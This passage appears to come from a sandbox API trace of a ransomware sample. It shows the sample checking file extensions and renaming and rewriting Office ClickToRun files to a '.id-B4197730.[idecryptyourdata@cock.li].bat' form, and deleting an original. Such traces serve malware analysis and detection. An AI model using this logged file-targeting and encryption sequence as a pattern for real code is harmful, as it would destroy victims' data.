shared\\ClickToRun\\concrt140.dll") returned 71 [0181.257] lstrlenW (lpString=".1cd") returned 4 [0181.257] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.257] lstrlenW (lpString=".jpg") returned 4 [0181.257] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.257] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.257] lstrlenW (lpString="mso20win32client.dll") returned 20 [0181.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.258] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=3144288) returned 1 [0181.258] CloseHandle (hObject=0x348) returned 1 [0181.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")) returned 0x20 [0181.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")) returned 1 [0181.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.260] lstrlenW (lpString=".doc") returned 4 [0181.260] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString=".docx") returned 5 [0181.260] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.260] lstrlenW (lpString=".pdf") returned 4 [0181.260] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString=".xls") returned 4 [0181.260] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString=".xlsx") returned 5 [0181.260] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.260] lstrlenW (lpString=".ppt") returned 4 [0181.260] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.260] lstrlenW (lpString=".zip") returned 4 [0181.260] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString=".rar") returned 4 [0181.260] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.260] lstrlenW (lpString=".bz2") returned 4 [0181.260] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.260] lstrlenW (lpString=".7z") returned 3 [0181.261] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString=".dbf") returned 4 [0181.261] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString=".1cd") returned 4 [0181.261] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString=".jpg") returned 4 [0181.261] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString=".doc") returned 4 [0181.261] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString=".docx") returned 5 [0181.261] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.261] lstrlenW (lpString=".pdf") returned 4 [0181.261] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString=".xls") returned 4 [0181.261] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString=".xlsx") returned 5 [0181.261] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.261] lstrlenW (lpString=".ppt") returned 4 [0181.261] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.261] lstrlenW (lpString=".zip") returned 4 [0181.261] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.261] lstrlenW (lpString=".rar") returned 4 [0181.262] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.262] lstrlenW (lpString=".bz2") returned 4 [0181.262] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.262] lstrlenW (lpString=".7z") returned 3 [0181.262] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.262] lstrlenW (lpString=".dbf") returned 4 [0181.262] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.262] lstrlenW (lpString=".1cd") returned 4 [0181.262] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 78 [0181.262] lstrlenW (lpString=".jpg") returned 4 [0181.262] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.262] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.262] lstrlenW (lpString="mso30win32client.dll") returned 20 [0181.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.263] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=4677216) returned 1 [0181.263] CloseHandle (hObject=0x348) returned 1 [0181.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")) returned 0x20 [0181.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.640] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")) returned 1 [0181.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString=".doc") returned 4 [0181.641] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString=".docx") returned 5 [0181.641] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.641] lstrlenW (lpString=".pdf") returned 4 [0181.641] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString=".xls") returned 4 [0181.641] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString=".xlsx") returned 5 [0181.641] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.641] lstrlenW (lpString=".ppt") returned 4 [0181.641] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString=".zip") returned 4 [0181.641] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString=".rar") returned 4 [0181.641] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.641] lstrlenW (lpString=".bz2") returned 4 [0181.641] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.641] lstrlenW (lpString=".7z") returned 3 [0181.641] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString=".dbf") returned 4 [0181.641] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString=".1cd") returned 4 [0181.641] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.641] lstrlenW (lpString=".jpg") returned 4 [0181.641] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.642] lstrlenW (lpString=".doc") returned 4 [0181.642] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString=".docx") returned 5 [0181.642] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.642] lstrlenW (lpString=".pdf") returned 4 [0181.642] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString=".xls") returned 4 [0181.642] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString=".xlsx") returned 5 [0181.642] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.642] lstrlenW (lpString=".ppt") returned 4 [0181.642] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.642] lstrlenW (lpString=".zip") returned 4 [0181.642] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString=".rar") returned 4 [0181.642] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.642] lstrlenW (lpString=".bz2") returned 4 [0181.642] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.642] lstrlenW (lpString=".7z") returned 3 [0181.642] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.642] lstrlenW (lpString=".dbf") returned 4 [0181.642] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.642] lstrlenW (lpString=".1cd") returned 4 [0181.643] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 78 [0181.643] lstrlenW (lpString=".jpg") returned 4 [0181.643] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.643] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.643] lstrlenW (lpString="OfficeC2RCom.dll") returned 16 [0181.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.644] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=996568) returned 1 [0181.644] CloseHandle (hObject=0x348) returned 1 [0181.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll")) returned 0x20 [0181.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.644] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.644] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.646] GetLastError () returned 0x0 [0181.646] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xf34d8, lpOverlapped=0x0) returned 1 [0181.797] WriteFile (in: hFile=0x388, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf34e0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf34e0, lpOverlapped=0x0) returned 1 [0181.908] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.908] WriteFile (in: hFile=0x388, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf4, lpOverlapped=0x0) returned 1 [0181.908] SetEndOfFile (hFile=0x388) returned 1 [0181.908] CloseHandle (hObject=0x388) returned 1 [0181.908] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.908] SetEndOfFile (hFile=0x348) returned 1 [0181.916] CloseHandle (hObject=0x348) returned 1 [0181.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.916] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll")) returned 1 [0181.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.947] lstrlenW (lpString=".doc") returned 4 [0181.947] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.947] lstrlenW (lpString=".docx") returned 5 [0181.947] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0181.947] lstrlenW (lpString=".pdf") returned 4 [0181.947] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.947] lstrlenW (lpString=".xls") returned 4 [0181.947] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.947] lstrlenW (lpString=".xlsx") returned 5 [0181.947] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0181.947] lstrlenW (lpString=".ppt") returned 4 [0181.947] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.947] lstrlenW (lpString=".zip") returned 4 [0181.947] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.948] lstrlenW (lpString=".rar") returned 4 [0181.948] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.948] lstrlenW (lpString=".bz2") returned 4 [0181.948] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.948] lstrlenW (lpString=".7z") returned 3 [0181.948] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.948] lstrlenW (lpString=".dbf") returned 4 [0181.948] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.948] lstrlenW (lpString=".1cd") returned 4 [0181.948] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.948] lstrlenW (lpString=".jpg") returned 4 [0181.948] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.948] lstrlenW (lpString=".doc") returned 4 [0181.948] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.948] lstrlenW (lpString=".docx") returned 5 [0181.948] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0181.948] lstrlenW (lpString=".pdf") returned 4 [0181.970] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.970] lstrlenW (lpString=".xls") returned 4 [0181.970] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.970] lstrlenW (lpString=".xlsx") returned 5 [0181.970] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0181.971] lstrlenW (lpString=".ppt") returned 4 [0181.971] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.971] lstrlenW (lpString=".zip") returned 4 [0181.971] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.971] lstrlenW (lpString=".rar") returned 4 [0181.971] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.971] lstrlenW (lpString=".bz2") returned 4 [0181.971] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.971] lstrlenW (lpString=".7z") returned 3 [0181.971] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.971] lstrlenW (lpString=".dbf") returned 4 [0181.971] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.971] lstrlenW (lpString=".1cd") returned 4 [0181.971] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 74 [0181.971] lstrlenW (lpString=".jpg") returned 4 [0181.971] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.971] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0181.971] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0181.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.972] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=2776664) returned 1 [0181.972] CloseHandle (hObject=0x348) returned 1 [0181.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe")) returned 0x20 [0181.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.974] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe")) returned 1 [0181.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.974] lstrlenW (lpString=".doc") returned 4 [0181.974] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0181.974] lstrlenW (lpString=".docx") returned 5 [0181.974] lstrcmpiW (lpString1=".docx", lpString2="n.exe") returned -1 [0181.974] lstrlenW (lpString=".pdf") returned 4 [0181.974] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.974] lstrlenW (lpString=".xls") returned 4 [0181.974] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.975] lstrlenW (lpString=".xlsx") returned 5 [0181.976] lstrcmpiW 